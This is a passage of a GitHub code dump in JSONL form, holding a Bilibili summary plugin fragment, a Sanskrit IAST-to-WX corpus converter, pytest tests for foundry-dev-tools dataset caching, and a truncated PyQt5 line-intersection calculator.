column_summarise(cache.title, cache.episodes[cid].content)\n else:\n raise ValueError(f\"Illegal Video(Column) types {cache.id}\")\n\n if ai_summary.response:\n cache.episodes[cid].openai = ai_summary.response\n 
cache.save()\n else:\n logger.warning(f\"Video(Column) {cache.id} summary failure: {ai_summary.raw}\")\n return f\"视频(专栏) {cache.id} 总结失败: 响应内容异常\\n{ai_summary.raw}\"\n return await t2i(cache.episodes[cid].openai or \"视频无法总结\", plugin_config.bilichat_openai_model)\n except AbortError as e:\n logger.exception(f\"Video(Column) {cache.id} summary aborted: {e}\")\n return f\"视频(专栏) {cache.id} 总结中止: {e}\"\n except Exception as e:\n capture_exception()\n logger.exception(f\"Video(Column) {cache.id} summary failed: {e}\")\n return f\"视频(专栏) {cache.id} 总结失败: {e}\"\n","repo_name":"Misaka-Mikoto-Tech/nonebot-plugin-bilichat","sub_path":"nonebot_plugin_bilichat/summary/openai_summarise.py","file_name":"openai_summarise.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24932526568","text":"import sys\nimport os\nimport subprocess as sp\n\nimport json\n\nfrom tqdm import tqdm\n\nimport common_methods as cm\nfrom devconvert import dev2slp, iast2slp, slp2dev, slp2iast, slp2tex, slp2wx, wx2slp, dev2wx\n\nscript, sent, dcs_dir, new_dcs_dir, missed, already = sys.argv\n\n\nletter_dict = {\n \"Ā\" : \"ā\", \"Ī\" : \"ī\", \"Ū\" : \"ū\", \"Ṛ\" : \"ṛ\", \"Ṝ\" : \"ṝ\", \"Ḷ\" : \"ḷ\",\n \"Ḹ\" : \"ḹ\", \"Ṅ\" : \"ṅ\", \"Ñ\" : \"ñ\", \"Ṭ\" : \"ṭ\", \"Ḍ\" : \"ḍ\", \"Ṇ\" : \"ṇ\",\n \"Ś\" : \"ś\", \"Ṣ\" : \"ṣ\"\n}\n\ndef iast2wx(text):\n \"\"\" Converts the input string text from iast to wx notation. \"\"\"\n \n return slp2wx.convert(iast2slp.convert(text))\n \n\ndef uncapitalise(text):\n \"\"\" Converts all the upper case letters to its corresponding lower\n case letters\n \"\"\"\n \n for key, value in letter_dict.items():\n text = text.replace(key, value)\n \n return text.lower()\n \n\ndef u_and_c(text):\n \"\"\" Uncapitalises first and then converts the text from iast \n to wx notation\n \"\"\"\n \n return iast2wx(uncapitalise(text))\n\n\ndef convert_to_wx(data):\n \"\"\" Converts all the details in data from iast to wx notation.\n \n Input -> data (data from DCS), source, destination notations\n \"\"\"\n \n new_data = {}\n \n new_data[\"text\"] = u_and_c(data.get(\"text\", \"\"))\n new_data[\"text_id\"] = data.get(\"text_id\", \"\")\n new_data[\"chapter\"] = u_and_c(data.get(\"chapter\", \"\"))\n new_data[\"chapter_id\"] = data.get(\"chapter_id\", \"\")\n new_data[\"sent_counter\"] = data.get(\"sent_counter\", \"\")\n new_data[\"sent_sub_counter\"] = data.get(\"sent_sub_counter\", \"\")\n new_data[\"layer\"] = data.get(\"layer\", \"\")\n new_data[\"citation_text\"] = u_and_c(data.get(\"citation_text\", \"\"))\n new_data[\"citation_chapter\"] = data.get(\"citation_chapter\", \"\")\n \n new_data[\"sent_id\"] = data.get(\"sent_id\", \"\")\n new_data[\"joint_sentence\"] = iast2wx(data.get(\"joint_sentence\", \"\"))\n new_data[\"position\"] = data.get(\"position\", [])\n \n dcs_unsegmented_forms = data.get(\"unsegmented_form\", [])\n dcs_word_forms = data.get(\"word_form\", [])\n dcs_stems = data.get(\"stem\", [])\n dcs_words = data.get(\"word\", [])\n dcs_miscs = data.get(\"misc\", [])\n dcs_preverbs = data.get(\"preverbs\", [])\n \n new_unsegmented_forms = []\n new_stems = []\n new_words = []\n new_word_forms = []\n new_preverbs = []\n new_miscs = []\n \n position = new_data[\"position\"]\n for i in range(len(position)):\n new_unsegmented_forms.append(iast2wx(dcs_unsegmented_forms[i]))\n new_inner_stems = []\n new_inner_words = []\n new_inner_word_forms = []\n new_inner_preverbs = []\n new_inner_miscs = []\n \n 
for j in range(len(position[i])):\n new_inner_stems.append(iast2wx(dcs_stems[i][j]))\n new_inner_words.append(iast2wx(dcs_words[i][j]))\n new_inner_word_forms.append(iast2wx(dcs_word_forms[i][j]))\n new_inner_preverbs.append(iast2wx(dcs_preverbs[i][j]))\n\n misc_lst = dcs_miscs[i][j].split(\"|\")\n new_misc_lst = []\n for misc_item in misc_lst:\n misc_item_split = misc_item.split(\"=\")\n new_misc_val = misc_item_split[1]\n if misc_item_split[0] == \"Unsandhied\":\n new_misc_val = iast2wx(new_misc_val)\n new_misc_lst.append(\"=\".join((misc_item_split[0], new_misc_val)))\n \n new_inner_miscs.append(\"|\".join(new_misc_lst))\n \n new_stems.append(new_inner_stems)\n new_words.append(new_inner_words)\n new_word_forms.append(new_inner_word_forms)\n new_preverbs.append(new_inner_preverbs)\n new_miscs.append(new_inner_miscs)\n \n new_data[\"unsegmented_form\"] = new_unsegmented_forms\n new_data[\"stem\"] = new_stems\n new_data[\"stem_id\"] = data.get(\"stem_id\")\n new_data[\"morph\"] = data.get(\"morph\")\n new_data[\"word\"] = new_words\n new_data[\"word_form\"] = new_word_forms\n new_data[\"preverbs\"] = new_preverbs\n \n new_data[\"upos\"] = data.get(\"upos\")\n new_data[\"xpos\"] = data.get(\"xpos\")\n new_data[\"head\"] = data.get(\"head\")\n new_data[\"deprel\"] = data.get(\"deprel\")\n new_data[\"deps\"] = data.get(\"deps\")\n new_data[\"misc\"] = new_miscs\n new_data[\"sem_ids\"] = data.get(\"sem_ids\")\n new_data[\"word_reconstructed\"] = data.get(\"word_reconstructed\")\n new_data[\"occ_ids\"] = data.get(\"occ_ids\")\n new_data[\"grammar\"] = data.get(\"grammar\")\n new_data[\"punctuation\"] = data.get(\"punctuation\")\n new_data[\"meanings\"] = data.get(\"meanings\")\n new_data[\"is_mantra\"] = data.get(\"is_mantra\")\n \n return new_data\n \n\nlines = cm.list_from_file(sent)\nmissed_file = open(missed, 'w')\nalready_file = open(already, 'w')\n\n#for x in range(len(lines)):\nfor i in tqdm(range(len(lines))):\n line = lines[i]\n line_s = line.split(\"\\t\")\n \n sent_id = line_s[0]\n sentence = line_s[1]\n \n dcs_path = os.path.join(dcs_dir, (str(sent_id) + \".json\"))\n if not os.path.isfile(dcs_path):\n missed_file.write(line + \"\\n\")\n continue\n \n new_json_path = os.path.join(new_dcs_dir, (str(sent_id) + \".json\"))\n if os.path.isfile(new_json_path):\n already_file.write(line + \"\\n\")\n continue\n \n dcs_data = cm.get_dcs_json(sent_id, dcs_dir)\n new_data = convert_to_wx(dcs_data)\n \n with open(new_json_path, 'w', encoding='utf-8') as out_file:\n json.dump(new_data, out_file, ensure_ascii=False)\n","repo_name":"SriramKrishnan8/dcs_sh_alignment","sub_path":"code/convert_dcs_to_wx.py","file_name":"convert_dcs_to_wx.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41315428182","text":"import os\nfrom pathlib import Path\nfrom unittest import mock\nfrom unittest.mock import MagicMock, patch\n\nimport fs\nimport pandas as pd\nimport pytest\nfrom pandas.testing import assert_frame_equal\nfrom pyspark.sql import SparkSession\n\nfrom foundry_dev_tools.cached_foundry_client import CachedFoundryClient\nfrom foundry_dev_tools.config import Configuration\nfrom foundry_dev_tools.foundry_api_client import (\n BranchNotFoundError,\n DatasetNotFoundError,\n)\nfrom foundry_dev_tools.utils.spark import get_spark_session\nfrom tests.foundry_mock_client import MockFoundryRestClient\n\nDATASET_RID = \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\nDATASET_PATH = 
\"/mock/path/ds1\"\nTRANSACTION_RID = \"transaction1\"\nAPI = \"foundry_dev_tools.foundry_api_client.FoundryRestClient\"\n\n\n@pytest.fixture()\ndef mock_client(tmpdir):\n return MockFoundryRestClient(filesystem=fs.open_fs(os.fspath(tmpdir)))\n\n\ndef test_config():\n fdt = CachedFoundryClient({\"jwt\": \"secret\"})\n\n assert fdt.api._headers()[\"Authorization\"] == \"Bearer secret\"\n assert fdt.api._requests_verify_value is not None\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n }\n ),\n)\n@patch(API + \".get_dataset\", MagicMock())\n@patch(API + \".get_branch\", MagicMock())\n@patch(API + \".is_dataset_in_trash\", MagicMock(return_value=False))\n@patch(API + \".open_transaction\", MagicMock(return_value=TRANSACTION_RID))\n@patch(API + \".commit_transaction\", MagicMock())\n@patch(API + \".infer_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_files\")\ndef test_save_pandas(upload_dataset_files):\n fdt = CachedFoundryClient()\n dataset_rid, transaction_id = fdt.save_dataset(\n pd.DataFrame(data={\"col1\": [1, 2], \"col2\": [3, 4]}),\n dataset_path_or_rid=DATASET_PATH,\n branch=\"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n\n args = upload_dataset_files.call_args[0]\n\n assert args[0] == DATASET_RID\n assert args[1] == TRANSACTION_RID\n # 1 file uploaded\n assert len(args[2]) == 1\n\n assert dataset_rid == \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\n assert transaction_id == \"transaction1\"\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n }\n ),\n)\n@patch(API + \".get_dataset\", MagicMock())\n@patch(API + \".get_branch\", MagicMock())\n@patch(API + \".is_dataset_in_trash\", MagicMock(return_value=False))\n@patch(API + \".open_transaction\", MagicMock(return_value=TRANSACTION_RID))\n@patch(API + \".commit_transaction\", MagicMock())\n@patch(API + \".infer_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_files\")\ndef test_save_spark(upload_dataset_files):\n fdt = CachedFoundryClient()\n df = (\n SparkSession.builder.master(\"local[*]\")\n .getOrCreate()\n .createDataFrame([[1, 2]], \"a:string, b: string\")\n )\n dataset_rid, transaction_id = fdt.save_dataset(\n df,\n dataset_path_or_rid=DATASET_PATH,\n branch=\"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n\n args = upload_dataset_files.call_args[0]\n\n assert args[0] == DATASET_RID\n assert args[1] == TRANSACTION_RID\n # at least two files uploaded, one parquet and one _SUCCESS\n assert len(args[2]) >= 2\n\n assert dataset_rid == \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\n assert transaction_id == \"transaction1\"\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n }\n ),\n)\n@patch(API + \".get_dataset\", MagicMock())\n@patch(API + \".get_branch\", MagicMock())\n@patch(API + \".is_dataset_in_trash\", MagicMock(return_value=False))\n@patch(API + \".open_transaction\", MagicMock(return_value=TRANSACTION_RID))\n@patch(API + \".commit_transaction\", MagicMock())\n@patch(API + \".infer_dataset_schema\", 
MagicMock())\n@patch(API + \".upload_dataset_schema\", MagicMock())\n@patch(API + \".upload_dataset_files\")\ndef test_save_model(upload_dataset_files):\n fdt = CachedFoundryClient()\n dataset_rid, transaction_id = fdt.save_model(\n {\"wow\": \"awesome_ml_model\"},\n dataset_path_or_rid=DATASET_PATH,\n branch=\"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n\n args = upload_dataset_files.call_args[0]\n\n assert args[0] == DATASET_RID\n assert args[1] == TRANSACTION_RID\n # one model object should be uploaded\n assert len(args[2]) == 1\n assert \"model.pickle\" in args[2]\n\n assert dataset_rid == \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\n assert transaction_id == \"transaction1\"\n\n\n@patch(API + \".abort_transaction\")\n@patch(API + \".create_branch\")\n@patch(API + \".create_dataset\")\n@patch(API + \".upload_dataset_files\")\n@patch(API + \".upload_dataset_schema\")\n@patch(API + \".infer_dataset_schema\")\n@patch(API + \".commit_transaction\")\n@patch(API + \".open_transaction\")\n@patch(API + \".is_dataset_in_trash\")\n@patch(API + \".get_branch\")\n@patch(API + \".get_dataset\")\n@patch(API + \".get_dataset_identity\")\ndef test_save_objects(\n get_dataset_identity,\n get_dataset,\n get_branch,\n is_dataset_in_trash,\n open_transaction,\n commit_transaction,\n infer_dataset_schema,\n upload_dataset_schema,\n upload_dataset_files,\n create_dataset,\n create_branch,\n abort_transaction,\n):\n fdt = CachedFoundryClient()\n path_file_dict = {\"path-in/foundry.pickle\": Path.cwd()}\n\n # happy path, dataset does not exist!\n get_dataset_identity.side_effect = DatasetNotFoundError(\"dataset_rid\")\n create_dataset.return_value = {\"rid\": DATASET_RID}\n is_dataset_in_trash.return_value = False\n open_transaction.return_value = TRANSACTION_RID\n dataset_rid, transaction_id = fdt._save_objects(\n path_file_dict, DATASET_PATH, \"master\", exists_ok=False, mode=\"SNAPSHOT\"\n )\n\n assert dataset_rid == \"ri.foundry.main.dataset.12345de3-b916-46ba-b097-c4326ea4342e\"\n assert transaction_id == \"transaction1\"\n commit_transaction.assert_called_once()\n abort_transaction.assert_not_called()\n commit_transaction.reset_mock()\n abort_transaction.reset_mock()\n get_dataset_identity.side_effect = None\n get_dataset_identity.return_value = {\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n }\n\n # Error in upload files -> verify abort transaction is called\n upload_dataset_files.side_effect = OSError()\n with pytest.raises(ValueError): # noqa: PT011\n fdt._save_objects(\n path_file_dict,\n DATASET_PATH,\n \"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n commit_transaction.assert_not_called()\n abort_transaction.assert_called_once()\n upload_dataset_files.side_effect = None\n\n # ValueError is thrown when dataset exists already\n with pytest.raises(ValueError): # noqa: PT011\n fdt._save_objects(\n path_file_dict,\n DATASET_PATH,\n \"master\",\n exists_ok=False,\n mode=\"SNAPSHOT\",\n )\n\n # ValueError is thrown when dataset is in trash\n is_dataset_in_trash.return_value = True\n with pytest.raises(ValueError): # noqa: PT011\n fdt._save_objects(\n path_file_dict,\n DATASET_PATH,\n \"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n is_dataset_in_trash.return_value = False\n\n # branch is created when it does not exist\n get_branch.side_effect = BranchNotFoundError(\"dataset_rid\", \"branch\")\n create_branch.reset_mock()\n fdt._save_objects(\n path_file_dict,\n DATASET_PATH,\n \"does-not-exist\",\n exists_ok=False,\n 
mode=\"SNAPSHOT\",\n )\n create_branch.assert_called_once()\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n \"last_transaction\": {\"rid\": TRANSACTION_RID, \"transaction\": {}},\n }\n ),\n)\n@patch(API + \".get_dataset_schema\")\n@patch(API + \".list_dataset_files\")\n@patch(API + \".is_dataset_in_trash\")\n@patch(API + \".get_dataset_last_transaction\")\n@patch(API + \".get_dataset_rid\")\ndef test_fetch_dataset(\n get_dataset_rid,\n get_dataset_last_transaction,\n is_dataset_in_trash,\n list_dataset_files,\n get_dataset_schema,\n mocker,\n):\n from_foundry_and_cache = mocker.spy(\n CachedFoundryClient,\n \"_download_dataset_and_return_local_path\",\n )\n from_cache = mocker.spy(\n CachedFoundryClient,\n \"_return_local_path_of_cached_dataset\",\n )\n online = mocker.spy(\n CachedFoundryClient,\n \"_get_dataset_identity_online\",\n )\n offline = mocker.spy(\n CachedFoundryClient,\n \"_get_dataset_identity_offline\",\n )\n\n get_dataset_rid.return_value = DATASET_RID\n get_dataset_last_transaction.return_value = {\"rid\": TRANSACTION_RID}\n is_dataset_in_trash.return_value = False\n df = get_spark_session().createDataFrame([[1]], \"col1:int\")\n get_dataset_schema.return_value = {\n \"fieldSchemaList\": [\n {\"type\": \"INTEGER\", \"name\": \"col1\", \"nullable\": True, \"customMetadata\": {}}\n ],\n \"dataFrameReaderClass\": \"com.palantir.foundry.spark.input.ParquetDataFrameReader\",\n \"customMetadata\": {\"format\": \"parquet\", \"options\": {}},\n }\n list_dataset_files.return_value = [\"spark/dataset.parquet\"]\n\n def download_dataset_files_mock(\n self,\n dataset_rid: str,\n output_directory: str,\n files: list,\n view=\"master\",\n ):\n path = Path(output_directory).joinpath(\"spark\")\n path.mkdir(parents=True, exist_ok=True)\n df.write.format(\"parquet\").option(\"compression\", \"snappy\").save(\n path=os.fspath(path), mode=\"overwrite\"\n )\n\n from foundry_dev_tools.foundry_api_client import FoundryRestClient\n\n backup = FoundryRestClient.download_dataset_files\n FoundryRestClient.download_dataset_files = download_dataset_files_mock\n\n fdt = CachedFoundryClient()\n path, dataset_identity = fdt.fetch_dataset(DATASET_PATH, \"master\")\n assert path.split(os.sep, maxsplit=-1)[-1] == TRANSACTION_RID + \".parquet\"\n assert dataset_identity == {\n \"dataset_rid\": DATASET_RID,\n \"last_transaction_rid\": TRANSACTION_RID,\n \"last_transaction\": {\"rid\": TRANSACTION_RID, \"transaction\": {}},\n \"dataset_path\": DATASET_PATH,\n }\n\n online.assert_called()\n online.reset_mock()\n offline.assert_not_called()\n offline.reset_mock()\n\n from_foundry_and_cache.assert_called()\n from_cache.assert_not_called()\n from_foundry_and_cache.reset_mock()\n from_cache.reset_mock()\n\n path2, dataset_identity2 = fdt.fetch_dataset(DATASET_PATH, \"master\")\n from_foundry_and_cache.assert_not_called()\n from_cache.assert_called()\n online.reset_mock()\n offline.reset_mock()\n\n assert path == path2\n\n # Offline Mode / transforms_freeze_cache = True\n fdt = CachedFoundryClient({\"transforms_freeze_cache\": True})\n path3, dataset_identity3 = fdt.fetch_dataset(DATASET_PATH, \"master\")\n\n assert path == path2 == path3\n\n online.assert_not_called()\n online.reset_mock()\n offline.assert_called()\n offline.reset_mock()\n\n path4, dataset_identity4 = fdt.fetch_dataset(DATASET_RID, \"master\")\n\n assert path == path2 == path3 == path4\n\n 
FoundryRestClient.download_dataset_files = backup\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n \"last_transaction\": {\n \"rid\": TRANSACTION_RID,\n \"transaction\": {\n \"record\": {},\n \"metadata\": {\n \"fileCount\": 1,\n \"hiddenFileCount\": 0,\n \"totalFileSize\": 1000,\n \"totalHiddenFileSize\": 0,\n },\n },\n },\n }\n ),\n)\n@patch(API + \".get_dataset_schema\")\n@patch(API + \".list_dataset_files\")\n@patch(API + \".is_dataset_in_trash\")\n@patch(API + \".get_dataset_rid\")\ndef test_load_dataset(\n get_dataset_rid,\n is_dataset_in_trash,\n list_dataset_files,\n get_dataset_schema,\n mocker,\n):\n from_foundry_and_cache = mocker.spy(\n CachedFoundryClient,\n \"_download_dataset_and_return_local_path\",\n )\n from_cache = mocker.spy(\n CachedFoundryClient,\n \"_return_local_path_of_cached_dataset\",\n )\n fdt = CachedFoundryClient()\n\n get_dataset_rid.return_value = DATASET_RID\n is_dataset_in_trash.return_value = False\n df = get_spark_session().createDataFrame([[1]], \"col1:int\")\n list_dataset_files.return_value = [\"pandas/dataset.parquet\"]\n get_dataset_schema.return_value = {\n \"fieldSchemaList\": [\n {\"type\": \"INTEGER\", \"name\": \"col1\", \"nullable\": True, \"customMetadata\": {}}\n ],\n \"dataFrameReaderClass\": \"com.palantir.foundry.spark.input.ParquetDataFrameReader\",\n \"customMetadata\": {\"format\": \"parquet\", \"options\": {}},\n }\n\n def download_dataset_files_mock(\n self,\n dataset_rid: str,\n output_directory: str,\n files: list,\n view=\"master\",\n *,\n branch: str = \"master\",\n ):\n path = Path(output_directory).joinpath(\"spark\")\n path.mkdir(parents=True, exist_ok=True)\n df.write.format(\"parquet\").option(\"compression\", \"snappy\").save(\n path=os.fspath(path), mode=\"overwrite\"\n )\n\n from foundry_dev_tools.foundry_api_client import FoundryRestClient\n\n backup = FoundryRestClient.download_dataset_files\n FoundryRestClient.download_dataset_files = download_dataset_files_mock\n\n spark_df = fdt.load_dataset(DATASET_PATH, \"master\")\n\n from_foundry_and_cache.assert_called()\n from_cache.assert_not_called()\n from_foundry_and_cache.reset_mock()\n from_cache.reset_mock()\n assert_frame_equal(spark_df.toPandas(), df.toPandas())\n\n fdt.load_dataset(DATASET_PATH, \"master\")\n from_foundry_and_cache.assert_not_called()\n from_cache.assert_called()\n\n FoundryRestClient.download_dataset_files = backup\n\n\ndef test_api_client_not_cached(mocker):\n mocker.patch(\n \"foundry_dev_tools.config.Configuration.get_config\",\n side_effect=[\n {\n \"jwt\": \"secret-token-CACHED-FOUNDRY\",\n \"foundry_url\": \"https://test.com\",\n \"cache_dir\": Configuration[\"cache_dir\"],\n },\n {\n \"jwt\": \"secret-token-ONE\",\n \"foundry_url\": \"https://test.com\",\n \"cache_dir\": Configuration[\"cache_dir\"],\n },\n {\n \"jwt\": \"secret-token-TWO\",\n \"foundry_url\": \"https://test.com\",\n \"cache_dir\": Configuration[\"cache_dir\"],\n },\n ],\n )\n fs = CachedFoundryClient()\n assert fs.config[\"jwt\"] == \"secret-token-CACHED-FOUNDRY\"\n assert fs.api._config[\"jwt\"] == \"secret-token-ONE\"\n assert fs.api._config[\"jwt\"] == \"secret-token-TWO\"\n\n\ndef test_save_string_model(mock_client):\n with mock.patch(\n \"foundry_dev_tools.cached_foundry_client.CachedFoundryClient.api\",\n mock_client,\n ):\n cfc = CachedFoundryClient()\n\n model = \"simplestring\"\n rid, transaction = cfc.save_model(\n model,\n 
dataset_path_or_rid=\"/Namespace1/project1/save_model_test\",\n branch=\"master\",\n exists_ok=True,\n mode=\"SNAPSHOT\",\n )\n\n from_foundry = cfc.fetch_dataset(\"/Namespace1/project1/save_model_test\")\n import pickle\n\n with Path(from_foundry[0]).joinpath(\"model.pickle\").open(mode=\"rb\") as f:\n model_returned = pickle.load(f) # noqa: S301, trusted, we are mocking\n\n assert model == model_returned\n\n\n@patch(\n API + \".get_dataset_identity\",\n MagicMock(\n return_value={\n \"dataset_rid\": DATASET_RID,\n \"dataset_path\": DATASET_PATH,\n \"last_transaction_rid\": TRANSACTION_RID,\n \"last_transaction\": {\n \"rid\": TRANSACTION_RID,\n \"transaction\": {\n \"record\": {\"view\": True},\n \"metadata\": {\n \"fileCount\": 1,\n \"hiddenFileCount\": 0,\n \"totalFileSize\": 0,\n \"totalHiddenFileSize\": 0,\n },\n },\n },\n }\n ),\n)\n@patch(API + \".get_dataset_schema\")\n@patch(API + \".query_foundry_sql\")\n@patch(API + \".is_dataset_in_trash\")\n@patch(API + \".get_dataset_rid\")\ndef test_load_dataset_is_view(\n get_dataset_rid,\n is_dataset_in_trash,\n query_foundry_sql,\n get_dataset_schema,\n mocker,\n):\n from_cache = mocker.spy(\n CachedFoundryClient,\n \"_return_local_path_of_cached_dataset\",\n )\n fdt = CachedFoundryClient()\n\n get_dataset_rid.return_value = DATASET_RID\n is_dataset_in_trash.return_value = False\n df = get_spark_session().createDataFrame([[1]], \"col1:int\")\n query_foundry_sql.return_value = df\n get_dataset_schema.return_value = {\n \"fieldSchemaList\": [\n {\"type\": \"INTEGER\", \"name\": \"col1\", \"nullable\": True, \"customMetadata\": {}}\n ],\n \"dataFrameReaderClass\": \"com.palantir.foundry.spark.input.ParquetDataFrameReader\",\n \"customMetadata\": {\"format\": \"parquet\", \"options\": {}},\n }\n\n spark_df = fdt.load_dataset(DATASET_PATH, \"master\")\n\n from_cache.assert_called()\n assert query_foundry_sql.call_count == 1\n from_cache.reset_mock()\n assert_frame_equal(spark_df.toPandas(), df.toPandas())\n\n fdt.load_dataset(DATASET_PATH, \"master\")\n assert query_foundry_sql.call_count == 1\n from_cache.assert_called()\n","repo_name":"emdgroup/foundry-dev-tools","sub_path":"tests/test_cached_foundry_client.py","file_name":"test_cached_foundry_client.py","file_ext":"py","file_size_in_byte":18409,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"29"} +{"seq_id":"585729232","text":"from PyQt5.QtWidgets import QWidget, QPushButton, QApplication, QLabel, QLineEdit, QGridLayout,QColorDialog,QMessageBox\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nimport numpy as np\r\n\r\nclass Window(QWidget):\r\n def __init__(self):\r\n QWidget.__init__(self)\r\n # stworzenie przycisku z napisem test\r\n self.button = QPushButton('Oblicz i rysuj', self)\r\n self.xlabel=QLabel(\"współrzędna XA\", self)\r\n self.xEdit=QLineEdit()\r\n self.ylabel=QLabel(\"współrzędna YA\", self)\r\n self.yEdit=QLineEdit()\r\n self.x_2label=QLabel(\"współrzędna XB\", self)\r\n self.x_2Edit=QLineEdit()\r\n self.y_2label=QLabel(\"współrzędna YB\", self)\r\n self.y_2Edit=QLineEdit()\r\n self.x_3label=QLabel(\"współrzędna XC\", self)\r\n self.x_3Edit=QLineEdit()\r\n self.y_3label=QLabel(\"współrzędna YC\", self)\r\n self.y_3Edit=QLineEdit()\r\n self.x_4label=QLabel(\"współrzędna XD\", self)\r\n self.x_4Edit=QLineEdit()\r\n self.y_4label=QLabel(\"współrzędna YD\", self)\r\n self.y_4Edit=QLineEdit()\r\n \r\n 
#create the colour chooser button \r\n        self.clrChoose=QPushButton(\"Wybierz kolor\", self)\r\n        \r\n        #create the button that clears the entered data \r\n        self.button1 = QPushButton('Usuń dane', self)\r\n        #create the button that saves the results to a file\r\n        self.button2 = QPushButton('Zapisz', self)\r\n        \r\n        #create the fields and captions for the coordinates of point P\r\n        self.info = QLabel (\"Informacje o Punkcie P\", self)\r\n        self.x_5label = QLabel(\"XP\",self)\r\n        self.x_6label = QLabel()\r\n        self.y_5label = QLabel(\"YP\",self)\r\n        self.y_6label = QLabel()\r\n        self.informacja = QLabel()\r\n        \r\n        self.figure=plt.figure()\r\n        self.canvas=FigureCanvas(self.figure)\r\n        # neat arrangement and centering of the widgets\r\n        layout = QGridLayout(self)\r\n        layout.addWidget(self.button, 9, 1, 1, -1)\r\n        layout.addWidget(self.xlabel, 1, 1)\r\n        layout.addWidget(self.xEdit, 1, 2)\r\n        layout.addWidget(self.ylabel, 2, 1)\r\n        layout.addWidget(self.yEdit, 2, 2)\r\n        layout.addWidget(self.x_2label, 3, 1)\r\n        layout.addWidget(self.x_2Edit, 3, 2)\r\n        layout.addWidget(self.y_2label, 4, 1)\r\n        layout.addWidget(self.y_2Edit, 4, 2)\r\n        layout.addWidget(self.x_3label, 5, 1)\r\n        layout.addWidget(self.x_3Edit, 5, 2)\r\n        layout.addWidget(self.y_3label, 6, 1)\r\n        layout.addWidget(self.y_3Edit, 6, 2)\r\n        layout.addWidget(self.x_4label, 7, 1)\r\n        layout.addWidget(self.x_4Edit, 7, 2)\r\n        layout.addWidget(self.y_4label, 8, 1)\r\n        layout.addWidget(self.y_4Edit, 8, 2)\r\n        layout.addWidget(self.canvas, 10, 1, 1, -1)\r\n        layout.addWidget(self.clrChoose, 11, 1, 1, -1)\r\n        \r\n        #information related to point P\r\n        layout.addWidget(self.info, 1, 3)\r\n        layout.addWidget(self.x_5label, 2, 3)\r\n        layout.addWidget(self.x_6label, 3, 3)\r\n        layout.addWidget(self.y_5label, 2, 4)\r\n        layout.addWidget(self.y_6label, 3, 4)\r\n        layout.addWidget(self.informacja, 4, 3)\r\n        \r\n        layout.addWidget(self.button1, 8, 3, 1, -1)\r\n        layout.addWidget(self.button2, 7, 3, 1, -1)\r\n        \r\n        # connect each button (signal) to its action (slot); connecting only once,\r\n        # the duplicate connects that used to sit above the layout made every click fire twice\r\n        self.button.clicked.connect(self.handleButton)\r\n        self.clrChoose.clicked.connect(self.clrChooseF)\r\n        self.button1.clicked.connect(self.usun)\r\n        self.button2.clicked.connect(self.zapisz)\r\n\r\n    def checkValues(self,lineE):\r\n        if lineE.text().lstrip('-').replace('.','').isdigit():\r\n            return float(lineE.text())\r\n        else:\r\n            sys.exit(\"zle wspolrzedne, wprowadz jeszcze raz\")  # \"bad coordinates, enter them again\"\r\n    \r\n    def rysuj(self,clr='m'):\r\n        x=self.checkValues(self.xEdit)\r\n        y=self.checkValues(self.yEdit)\r\n        \r\n        x1 = self.checkValues(self.x_2Edit)\r\n        y1 = self.checkValues(self.y_2Edit)\r\n        \r\n        x2 = self.checkValues(self.x_3Edit)\r\n        y2 = self.checkValues(self.y_3Edit)\r\n        \r\n        x3 = self.checkValues(self.x_4Edit)\r\n        y3 = self.checkValues(self.y_4Edit)\r\n        \r\n        P1, P2=[x, x1],[y, y1]\r\n        P3, P4=[x2, x3],[y2, y3]\r\n        \r\n        S=[x,y,\r\n           x1,y1,\r\n           x2,y2,\r\n           x3,y3]\r\n        M=(S[2]-S[0])*(S[7]-S[5])-(S[3]-S[1])*(S[6]-S[4])\r\n\r\n        if M != 0:\r\n            t1=((S[4]-S[0])*(S[7]-S[5])-(S[5]-S[1])*(S[6]-S[4]))/((S[2]-S[0])*(S[7]-S[5])-(S[3]-S[1])*(S[6]-S[4]))\r\n            t2=((S[4]-S[0])*(S[3]-S[1])-(S[5]-S[1])*(S[2]-S[0]))/((S[2]-S[0])*(S[7]-S[5])-(S[3]-S[1])*(S[6]-S[4])) \r\n            